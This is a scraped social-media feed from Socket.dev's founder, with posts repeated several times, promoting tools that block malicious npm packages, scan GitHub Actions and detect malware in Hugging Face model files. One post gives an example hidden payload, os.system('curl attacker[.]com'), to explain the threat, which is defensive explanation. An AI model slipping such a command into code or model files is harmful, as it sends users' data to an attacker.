Feross
@feross.bsky.social
🧙♂️ Mad scientist • ✨ Founder + CEO @Socket.dev (http://socket.dev) •🌲 Stanford lecturer (http://cs253.stanford.edu) • ❤️ Open source at WebTorrent + StandardJS
npm i -g sfw
sfw npm install lodahs <-- blocked as malware
Full episode here 👇
www.youtube.com/watch?v=fLtM...
sfw npm install lodahs <-- blocked as malware
Full episode here 👇
www.youtube.com/watch?v=fLtM...
Feross on the most serious supply chain attacks in npm history (and what we can do about it)
YouTube video by Changelog
www.youtube.com
November 12, 2025 at 7:04 PM
npm i -g sfw
sfw npm install lodahs <-- blocked as malware
Full episode here 👇
www.youtube.com/watch?v=fLtM...
sfw npm install lodahs <-- blocked as malware
Full episode here 👇
www.youtube.com/watch?v=fLtM...
• Audit your GitHub Actions
• And yes… add a firewall for your dependencies
If you haven't heard about Socket Firewall. It’s free. It works with npm, PyPI, and Cargo. And it blocks malicious packages before they hit your machine. No config. No API keys. Just install and go ⚡️
• And yes… add a firewall for your dependencies
If you haven't heard about Socket Firewall. It’s free. It works with npm, PyPI, and Cargo. And it blocks malicious packages before they hit your machine. No config. No API keys. Just install and go ⚡️
Feross on the most serious supply chain attacks in npm history (and what we can do about it)
YouTube video by Changelog
www.youtube.com
November 12, 2025 at 7:04 PM
• Audit your GitHub Actions
• And yes… add a firewall for your dependencies
If you haven't heard about Socket Firewall. It’s free. It works with npm, PyPI, and Cargo. And it blocks malicious packages before they hit your machine. No config. No API keys. Just install and go ⚡️
• And yes… add a firewall for your dependencies
If you haven't heard about Socket Firewall. It’s free. It works with npm, PyPI, and Cargo. And it blocks malicious packages before they hit your machine. No config. No API keys. Just install and go ⚡️
Try it out here: socket.dev/blog/socket-...
Introducing Socket Firewall Enterprise: Flexible, Configurab...
Socket Firewall Enterprise is now available with flexible deployment, configurable policies, and expanded language support.
socket.dev
October 24, 2025 at 3:56 PM
Try it out here: socket.dev/blog/socket-...
We’ve also expanded language support to 10+ ecosystems so no matter what stack you’re on, you’re covered.
The idea is simple: every package download should be verified and governed by your rules, in real time. That’s what Socket Firewall does.
The idea is simple: every package download should be verified and governed by your rules, in real time. That’s what Socket Firewall does.
October 24, 2025 at 3:56 PM
We’ve also expanded language support to 10+ ecosystems so no matter what stack you’re on, you’re covered.
The idea is simple: every package download should be verified and governed by your rules, in real time. That’s what Socket Firewall does.
The idea is simple: every package download should be verified and governed by your rules, in real time. That’s what Socket Firewall does.
With Socket Firewall Enterprise, you can set up your own security and license policies, self-host it, run it on-prem, and get centralized visibility into all the packages being used across your organization, even if those packages never get checked into source control.
October 24, 2025 at 3:56 PM
With Socket Firewall Enterprise, you can set up your own security and license policies, self-host it, run it on-prem, and get centralized visibility into all the packages being used across your organization, even if those packages never get checked into source control.
Socket Firewall blocks malicious packages before install time, protecting both developer machines, build servers, and prod from supply chain attacks.
October 24, 2025 at 3:56 PM
Socket Firewall blocks malicious packages before install time, protecting both developer machines, build servers, and prod from supply chain attacks.
For several years now, Socket's been helping teams stay protected from supply chain attacks. But attackers don’t just target production environments. They also go after developer machines directly to run malicious code. That's why we built Socket Firewall.
October 24, 2025 at 3:56 PM
For several years now, Socket's been helping teams stay protected from supply chain attacks. But attackers don’t just target production environments. They also go after developer machines directly to run malicious code. That's why we built Socket Firewall.
What used to be shocking is now disturbingly common — attackers are using smarter social engineering techniques to target maintainers. And legacy vulnerability scanners can’t keep up.
October 24, 2025 at 3:56 PM
What used to be shocking is now disturbingly common — attackers are using smarter social engineering techniques to target maintainers. And legacy vulnerability scanners can’t keep up.
A few years ago, high-profile package compromises were rare. But not anymore. In just the past few months, we’ve seen trusted open source packages like tinycolor, chalk, nx, and prettier get compromised.
October 24, 2025 at 3:56 PM
A few years ago, high-profile package compromises were rare. But not anymore. In just the past few months, we’ve seen trusted open source packages like tinycolor, chalk, nx, and prettier get compromised.
Get started here: socket.dev/blog/introdu...
Introducing GitHub Actions Scanning Support - Socket
Detect malware, unsafe data flows, and license issues in GitHub Actions with Socket’s new workflow scanning support.
socket.dev
October 23, 2025 at 8:31 PM
Get started here: socket.dev/blog/introdu...
Bottom line — today CI/CD is probably the weakest link in your security posture.
If your team uses GitHub Actions, install Socket — it takes literally 2 clicks — and turn on GitHub Actions scanning today.
If your team uses GitHub Actions, install Socket — it takes literally 2 clicks — and turn on GitHub Actions scanning today.
October 23, 2025 at 8:24 PM
Bottom line — today CI/CD is probably the weakest link in your security posture.
If your team uses GitHub Actions, install Socket — it takes literally 2 clicks — and turn on GitHub Actions scanning today.
If your team uses GitHub Actions, install Socket — it takes literally 2 clicks — and turn on GitHub Actions scanning today.
Socket now scans GitHub Actions for malware, unsafe data flows, and sketchy code. We actually look inside your workflows — at every composite action and transitive dependency, including all the JavaScript and Python code that powers most actions — to block dangerous behavior before it hits prod.
October 23, 2025 at 8:24 PM
Socket now scans GitHub Actions for malware, unsafe data flows, and sketchy code. We actually look inside your workflows — at every composite action and transitive dependency, including all the JavaScript and Python code that powers most actions — to block dangerous behavior before it hits prod.
And those friendly-looking tags like v1 that everyone uses? They can change at any time. Which means the code you trusted yesterday might be doing something totally different today.
That’s a huge blind spot in your CI/CD pipeline.
That’s a huge blind spot in your CI/CD pipeline.
October 23, 2025 at 8:24 PM
And those friendly-looking tags like v1 that everyone uses? They can change at any time. Which means the code you trusted yesterday might be doing something totally different today.
That’s a huge blind spot in your CI/CD pipeline.
That’s a huge blind spot in your CI/CD pipeline.
4️⃣ CVE scanning — covers every language in your stack, even beyond the 10+ Socket supports today.
All unified under one consistent policy + results format. Because you shouldn’t need 6 scanners to ship safe code.
🚀 Try it today: socket.dev/blog/socket-...
All unified under one consistent policy + results format. Because you shouldn’t need 6 scanners to ship safe code.
🚀 Try it today: socket.dev/blog/socket-...
Unify Your Security Stack with Socket Basics - Socket
A single platform for static analysis, secrets detection, container scanning, and CVE checks—built on trusted open source tools, ready to run out of t...
socket.dev
October 21, 2025 at 7:00 PM
4️⃣ CVE scanning — covers every language in your stack, even beyond the 10+ Socket supports today.
All unified under one consistent policy + results format. Because you shouldn’t need 6 scanners to ship safe code.
🚀 Try it today: socket.dev/blog/socket-...
All unified under one consistent policy + results format. Because you shouldn’t need 6 scanners to ship safe code.
🚀 Try it today: socket.dev/blog/socket-...
1️⃣ Static analysis (SAST) for 14 languages — finds real code issues like command injection or unsafe deserialization before they land.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
October 21, 2025 at 7:00 PM
1️⃣ Static analysis (SAST) for 14 languages — finds real code issues like command injection or unsafe deserialization before they land.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
2️⃣ Secrets detection — catches leaked API keys before they’re merged.
3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.
5️⃣
This is just the start.
We’re extending Socket to protect the full Hugging Face ecosystem — models, datasets, and Spaces.
The AI supply chain should be as safe and auditable as traditional software.
👉 Try it here: socket.dev/blog/announcing-experimental-malware-scanning-for-hugging-face
This is just the start.
We’re extending Socket to protect the full Hugging Face ecosystem — models, datasets, and Spaces.
The AI supply chain should be as safe and auditable as traditional software.
👉 Try it here: socket.dev/blog/announcing-experimental-malware-scanning-for-hugging-face
Announcing Experimental Malware Scanning for the Hugging Fac...
Socket is launching experimental protection for the Hugging Face ecosystem, scanning for malware and malicious payload injections inside model files t...
socket.dev
October 20, 2025 at 4:21 PM
5️⃣
This is just the start.
We’re extending Socket to protect the full Hugging Face ecosystem — models, datasets, and Spaces.
The AI supply chain should be as safe and auditable as traditional software.
👉 Try it here: socket.dev/blog/announcing-experimental-malware-scanning-for-hugging-face
This is just the start.
We’re extending Socket to protect the full Hugging Face ecosystem — models, datasets, and Spaces.
The AI supply chain should be as safe and auditable as traditional software.
👉 Try it here: socket.dev/blog/announcing-experimental-malware-scanning-for-hugging-face
4️⃣
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
October 20, 2025 at 4:21 PM
4️⃣
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...
Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.
3️⃣
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
October 20, 2025 at 4:21 PM
3️⃣
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.
That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.
We’ve already seen payloads hiding in models exfiltrating data, spawning shells.
2️⃣
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
October 20, 2025 at 4:21 PM
2️⃣
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors
If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️